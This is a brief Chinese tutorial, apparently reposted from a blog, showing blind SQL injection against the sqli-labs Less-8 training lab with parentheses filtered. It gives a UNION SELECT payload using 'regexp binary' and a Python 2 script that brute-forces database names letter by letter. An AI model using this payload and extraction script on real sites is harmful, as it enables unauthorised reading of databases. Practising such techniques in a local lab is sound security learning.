0x00 环境搭建
sqli-labs 第八关, 简单修改下源代码, 加入下面一行代码
$id=preg_replace('/\(|\)/', "",$id); // 过滤小括号
0x01 脚本编写
1, 构造 payload
'union select 1,2,3 from information_schema.tables where table_schema regexp binary'^%s.*$' -- -
2, 脚本如下
- #coding=utf-8
- import urllib
- url = "http://127.0.0.1/sqli-labs-master/Less-8/?id=1%s"
- # 测试 payload
- payload = "'and 1=2 union select 1,2,3 from information_schema.tables where table_schema regexp binary'^%s.*$'-- -"
- # 简单测试字典, 这里可以借助 string.printable
- list='abcdefghijklmnopqrstuvwxyz'
- # 递归暴库
- def check(str):
- for ch in list:
- payloads=payload % (str+ch)
- if check1(payloads):
- print str+ch
- check(str+ch)
- # 判断正则匹配结果是否正确
- def check1(str1):
- resp=urllib.urlopen(url % str1).read()
- if "You are in" in resp:
- return True
- else:
- return False
- if __name__ == "__main__":
- check("")
脚本执行部分结果
来源: http://www.bubuko.com/infodetail-2550388.html